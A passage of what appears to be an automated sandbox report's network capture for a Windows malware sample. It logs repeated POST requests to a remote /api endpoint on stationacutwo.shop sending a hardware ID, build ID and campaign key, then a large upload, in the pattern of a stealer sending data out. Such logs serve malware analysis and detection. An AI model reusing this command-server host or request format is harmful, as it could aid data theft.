2024-07-02 19:24:25 UTC	2830	OUT	Data Raw: 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f Data Ascii: 2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R?
2024-07-02 19:24:26 UTC	800	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 19:24:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=j3uhunvn9rjm6nnatj099c1kbe; expires=Sat, 26-Oct-2024 13:11:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LkmJNgp2kiUosjQnQxo7WmChQVPi4y4%2BpFxY5mG7SpVRNqb22BH2rYPNUWI4iN3MtMsIK6%2FrA2Olyp7DIeEgBeNJBIU8IdD2oXtpWBYEijmNzAHgXOHaPz8vFh3tqR2FEgTfXEw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d10414fd7dc352-EWR alt-svc: h3=":443"; ma=86400
2024-07-02 19:24:26 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-02 19:24:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	188.114.96.3	443	7344	C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 19:24:27 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8782 Host: stationacutwo.shop
2024-07-02 19:24:27 UTC	8782	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 42 37 33 42 34 42 33 32 34 31 34 44 34 41 43 33 38 44 43 46 30 35 36 36 43 33 30 45 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"77B73B4B32414D4AC38DCF0566C30E6C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
2024-07-02 19:24:27 UTC	812	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 19:24:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r44nmdodsh6hctkcgcab095dgf; expires=Sat, 26-Oct-2024 13:11:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kt%2FyJiFtFwGiZn07IV5It%2BTFiY%2Fl2ODDm11%2BrgDaSiDjD7E6qTffp%2B8H3C3f6%2F%2FNjnJjQhwOktGX5JZCmMohmGRPw1EZvFwVTUEBAs2rRrttSJ%2F2j9pptpXaGcRJXrECOAuzvYo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d1041d2b980f89-EWR alt-svc: h3=":443"; ma=86400
2024-07-02 19:24:27 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-02 19:24:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	188.114.96.3	443	7344	C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 19:24:28 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20435 Host: stationacutwo.shop
2024-07-02 19:24:28 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 42 37 33 42 34 42 33 32 34 31 34 44 34 41 43 33 38 44 43 46 30 35 36 36 43 33 30 45 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"77B73B4B32414D4AC38DCF0566C30E6C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
2024-07-02 19:24:28 UTC	5104	OUT	Data Raw: 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-07-02 19:24:28 UTC	802	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 19:24:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=28nqm9re4md4nbuhlfj3m27ope; expires=Sat, 26-Oct-2024 13:11:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=th9Cf37oqGFe9COcwgGZUgti9TNT5IgQAT7CMewFc9AaSj4hhHtN07%2FpKeEjaIs%2F9PdhBoCeOkMHKn6zvtgrXu6Ams1vOrIQK84jrp7KW%2FwqFeVYfP7tR1tL53axX8GUE3EKdg0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d104244b1d17a9-EWR alt-svc: h3=":443"; ma=86400
2024-07-02 19:24:28 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-02 19:24:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	188.114.96.3	443	7344	C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 19:24:29 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 5438 Host: stationacutwo.shop
2024-07-02 19:24:29 UTC	5438	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 42 37 33 42 34 42 33 32 34 31 34 44 34 41 43 33 38 44 43 46 30 35 36 36 43 33 30 45 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"77B73B4B32414D4AC38DCF0566C30E6C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
2024-07-02 19:24:29 UTC	806	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 19:24:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9u2hr8q0r0ldt3p7ovfmdnf7h2; expires=Sat, 26-Oct-2024 13:11:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gE0jXcVJMZdzD8iS7r5xJPjEwaVEMuLgmCy%2BCkmCJWb49HreZg7jTSIJ898KZeU5qKWMxFkhH%2FpXztYu0z60VtaRYaf%2BiBNentj%2FkrmqeOxVr2V26sMh77eBRVPNM%2BXUtk7MMdo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d1042cfb618cd7-EWR alt-svc: h3=":443"; ma=86400
2024-07-02 19:24:29 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-02 19:24:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	188.114.96.3	443	7344	C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 19:24:30 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1304 Host: stationacutwo.shop
2024-07-02 19:24:30 UTC	1304	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 42 37 33 42 34 42 33 32 34 31 34 44 34 41 43 33 38 44 43 46 30 35 36 36 43 33 30 45 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"77B73B4B32414D4AC38DCF0566C30E6C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
2024-07-02 19:24:31 UTC	804	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 19:24:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hfcqvdgu00a8eq2t2ij08mt21s; expires=Sat, 26-Oct-2024 13:11:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2BhnPAU7tIEwhmQ3sEtlplIQRY8aDyOFxf90mX6hcA7GlOXGHx02nod3jDj3sYIlySurXtusy4JvyndXDVomAEUt3JIbO73l%2BsaQUnPMNz1M0v%2BnDpUE%2FanFM7y9Lb980aQTfQg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d10433bbbbc42c-EWR alt-svc: h3=":443"; ma=86400
2024-07-02 19:24:31 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-02 19:24:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49739	188.114.96.3	443	7344	C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 19:24:32 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 576308 Host: stationacutwo.shop
2024-07-02 19:24:32 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 42 37 33 42 34 42 33 32 34 31 34 44 34 41 43 33 38 44 43 46 30 35 36 36 43 33 30 45 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"77B73B4B32414D4AC38DCF0566C30E6C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
2024-07-02 19:24:32 UTC	15331	OUT	Data Raw: 64 f9 54 c9 30 19 e6 43 01 2b ac 95 b0 7e 2c 01 c4 3f 09 d9 69 7f 16 72 0d 2c 98 e1 c1 5e dc ce 55 31 b4 dd 10 60 ad fc 05 6e 32 11 95 d1 60 ad 4b 3a 24 57 55 68 42 ac a2 89 18 65 a0 5d 26 02 82 1f cd b9 6f 1f 46 71 ec 4e cb d3 53 b2 7b dc b0 07 7c d7 1a b4 a4 6a 19 ab 9f ff bf b5 93 2e 38 60 ba cd cf bc 03 98 12 98 31 7f c4 26 0e 01 35 a8 41 71 56 dd 82 b4 4e e0 6c 79 68 29 30 ed 97 46 d3 50 98 59 ee 37 75 ac 00 22 89 61 21 3f 40 8a d7 66 4f fe 0d 40 ef 77 30 17 3d 06 6b 1f e9 8d 90 46 ec 2e e1 d8 a2 bd 34 fa d2 67 fb 06 c9 ee f4 59 f4 1c 35 06 8a 1c 21 6a ef 08 06 ea 3f d6 73 5a 34 4d 76 c7 4c 6b f4 c2 53 b8 f6 c2 2c 2c ac bb 6c 9e 9d bf 37 fe ed 6e 3a 77 6a 96 52 2e 3d 53 38 bf ae cb 8a 4c 9f df 60 3f 0d 88 e9 f3 79 8e 0f 01 61 88 49 6d ae 4b cf 6e 44 Data Ascii: dT0C+~,?ir,^U1`n2`K:$WUhBe]&oFqNS{\|j.8`1&5AqVNlyh)0FPY7u"a!?@fO@w0=kF.4gY5!j?sZ4MvLkS,,l7n:wjR.=S8L`?yaImKnD
2024-07-02 19:24:32 UTC	15331	OUT	Data Raw: 54 8c ba 82 82 9f 7c 3d cd 94 58 c9 db 72 fb 5c fe 7c 2e a8 af 75 a5 55 8f 1b 37 e8 37 91 38 25 eb d3 ff 88 33 b7 ce 30 73 6a 48 f8 49 63 b5 3e 84 c8 29 43 a2 5d 36 2f 93 7c 38 d8 a9 3f f6 27 fe bb ef 59 d9 48 4a 95 2e fe dd 60 3d 18 10 d0 01 a5 9c d7 1b ee 22 80 3a ab c3 18 e4 77 e7 fe 5c 98 7f eb b1 e3 45 04 9d 9e 95 11 b0 b5 bd 08 eb e2 67 e8 92 64 fb d6 cf df c7 03 71 ae 20 54 37 1e 82 11 63 e2 2d 0f d6 12 97 4d 10 87 a2 00 5c 2e 61 5a ff df 0f 21 3c 8f 6a 7d 8f d0 aa 14 63 2a 43 65 d1 1e c5 84 a0 b0 23 20 1d 81 fa be 12 3e 34 10 b8 b9 fd 2b c0 33 d9 07 1a 5f 38 03 d1 ec e7 46 f2 be c8 45 fc 23 98 77 49 5c f2 8e 30 74 09 7c 75 96 39 ec f7 6f e1 a1 3b 94 99 1d 34 ab ed 1f 92 26 f0 88 11 a4 f2 41 92 3c 6b cb e0 fa 60 b2 1b fb e4 ac 4f 53 83 64 d4 26 3c Data Ascii: T\|=Xr\\|.uU778%30sjHIc>)C]6/\|8?'YHJ.`=":w\Egdq T7c-M\.aZ!<j}c*Ce# >4+3_8FE#wI\0t\|u9o;4&A<k`OSd&<
2024-07-02 19:24:32 UTC	15331	OUT	Data Raw: bd 8c cb f9 c5 5f ac b0 e9 7f da 7e e1 79 00 93 cf e9 ac 25 5b 3e 41 24 aa 60 ca b0 a1 ec 10 f6 f0 f2 70 c1 c0 00 0a d9 65 70 75 f1 dd ed 73 7f fa b1 24 6b 0d 66 02 59 15 b5 fe f2 23 7d ef f4 95 78 c3 a3 9c c6 53 c0 f3 28 1a df 6c d0 b8 55 fd 70 81 7f 1c 13 81 38 45 98 15 c1 ff bd f7 0d 30 eb 1f b4 8a b0 1b eb 37 23 0f d0 9a d1 2b 6f 08 c5 0d 09 ea 00 da 02 ec 4b f1 24 0e 98 7b 6b e5 f9 38 22 81 b8 b9 58 97 42 5c 55 5b 23 2a c4 6b 14 7d b7 26 93 89 52 62 f1 d0 71 83 ea 58 35 85 2a 74 70 70 ac 11 e9 09 15 70 0e d7 77 87 69 8c d9 73 02 2e 2c 17 f0 bf 93 5e 1b 2b b2 65 c8 0d 3d fa e8 26 36 b8 d3 03 39 ca 5a a1 02 03 07 98 ec ac 73 f6 95 f9 67 42 c7 17 9e 36 c9 36 8e 81 1e 1b 95 f8 64 b4 99 25 76 dc e9 f3 c6 e9 dc 1f a2 79 dc 3e 2e 3c 1c fe 7c e9 d8 50 6d 72 Data Ascii: _~y%[>A$`pepus$kfY#}xS(lUp8E07#+oK${k8"XB\U[#k}&RbqX5tpppwis.,^+e=&69ZsgB66d%vy>.<\|Pmr
2024-07-02 19:24:32 UTC	15331	OUT	Data Raw: e6 02 87 54 91 5f 6c 8e 41 0a d6 ec a0 70 bb 9b 06 f3 56 7c 5a 2d 55 bb ba 05 a9 03 98 b8 4d 61 96 cb 45 42 4d 37 3c b5 f9 4a 18 d3 13 40 e6 80 0b a1 ae 9c b8 37 e6 44 2d 16 8e 09 16 c0 ff ce 50 a8 b3 13 d2 13 f9 88 5e cc 82 87 2e 73 c5 97 1e 8a b3 3e 81 9a 27 30 52 bd 0c f3 a3 0c 4a 58 80 85 e7 d8 27 8e 59 79 75 0a 8f c7 b7 e2 9b 49 f0 d7 81 cd 09 3b ec 22 d8 9e 98 71 cd 17 83 13 12 13 16 c9 71 ac 9e 67 70 54 ec 7f 28 22 87 97 1f db 76 f0 22 06 f8 3f 21 b8 ad db 82 ac 66 22 8a d4 2c 38 5a 86 f0 6e 71 4f 3b a1 44 b1 08 6a c6 55 e7 da 50 7f 96 9c 1b a7 20 38 b2 bb b1 38 d4 8f f5 93 2b ab b9 cc 72 c6 ba d2 05 57 b5 a8 54 51 cd b8 f7 c7 9a e6 46 4d f3 3a f0 d6 f3 68 d2 00 03 fe f9 1f 7c 60 c6 ca 2d bd 8a 98 3a a4 9e 13 bb 7d 69 5f ba ef f6 f6 90 8a 8c 78 cd Data Ascii: T_lApV\|Z-UMaEBM7<J@7D-P^.s>'0RJX'YyuI;"qqgpT("v"?!f",8ZnqO;DjUP 88+rWTQFM:h\|`-:}i_x
2024-07-02 19:24:32 UTC	15331	OUT	Data Raw: 49 76 61 92 f3 51 b4 d4 a6 25 8b 58 53 53 52 86 52 6f 4c 86 98 58 9c 4c d9 ca f7 fa bc 26 5e e1 6f 52 10 30 9f 31 99 29 db 45 bb c3 7d 63 5d 5b 15 44 1f e7 fc f8 04 8f f3 fd d4 81 2f ad 3a 2a b3 4a 25 9f 29 24 ed 15 e0 af 09 f9 35 db f0 b7 48 b5 81 2d 5f 75 61 17 de 4d e0 a8 1b a7 c3 d0 36 41 ea d9 8a 14 8a fe 4f d3 cc 0f bf 12 8e f9 3a e3 ed 71 7f 89 c1 a8 eb e0 e6 40 2c aa 9e 78 d5 72 34 4d 15 07 4d 46 0c 99 65 31 c3 b8 0e 21 f1 ab 6a 57 58 68 08 e8 a0 89 3e 3c c5 8d 9e 36 13 80 5f e9 6f df 79 47 cf 6b 03 61 f6 b3 1e 22 80 22 31 45 4f 06 b3 3e 4d d8 40 fc 01 aa 08 60 8a a1 59 f9 67 1c 41 e0 1e 1c 47 e1 ee 74 e8 75 2b e2 fa 6f 7e 67 fa da cf a6 eb ab ce 80 1d e0 59 e1 87 54 2d 5d 5e e7 48 f7 6b b4 39 94 9e e6 77 02 94 14 40 50 0a 58 06 ab 57 5a ac 6c 6f Data Ascii: IvaQ%XSSRRoLXL&^oR01)E}c][D/:*J%)$5H-_uaM6AO:q@,xr4MMFe1!jWXh><6_oyGka""1EO>M@`YgAGtu+o~gYT-]^Hk9w@PXWZlo
2024-07-02 19:24:32 UTC	15331	OUT	Data Raw: 9d 6c ac 09 8b 11 66 21 d5 4d 1c b4 33 37 1e 58 ec 25 6b be 21 73 bb a3 4b f9 e0 fe 5f 7f bb 6c 9d 87 53 1f de ba ee c8 1b 82 25 51 23 3a bc bb f2 f0 31 b2 ba 38 cf fd 25 b6 04 8f 64 62 b4 e3 83 e0 aa 8a 36 06 b8 eb 77 a2 58 09 68 75 cc d6 56 cc 4b 50 98 12 2e 3d 8e 73 9b 9d 88 a2 d6 eb 08 62 5b 6e 6c 9b 5d 34 33 1c 10 7f 36 94 ad ca 42 aa 22 f3 73 10 e3 b2 a9 93 d7 ef a1 3b 6f a4 dc 16 11 64 66 88 a2 68 6f e0 a1 a9 46 8a 2a 07 ff 8d bf 88 85 04 07 f3 a9 aa ac ff 6e b7 43 27 5a 9c b3 aa f6 d5 d2 7b 83 5f 0d 58 5d 63 a4 d5 32 f6 1e e1 a0 1a ab 84 5c 6c 19 fc 73 c6 20 61 a3 b2 d5 ea 52 f8 a7 6c 0f 56 4b 32 15 50 27 c0 b0 c6 75 f0 46 ce 5c 01 2e ff 38 c5 74 03 c2 df 56 04 18 86 29 6b 75 25 05 b5 0c 7e 6e b8 ba 99 33 b6 f6 cd ab 29 a6 ef a6 28 ea a6 b8 34 5b Data Ascii: lf!M37X%k!sK_lS%Q#:18%db6wXhuVKP.=sb[nl]436B"s;odfhoF*nC'Z{_X]c2\ls aRlVK2P'uF\.8tV)ku%~n3)(4[
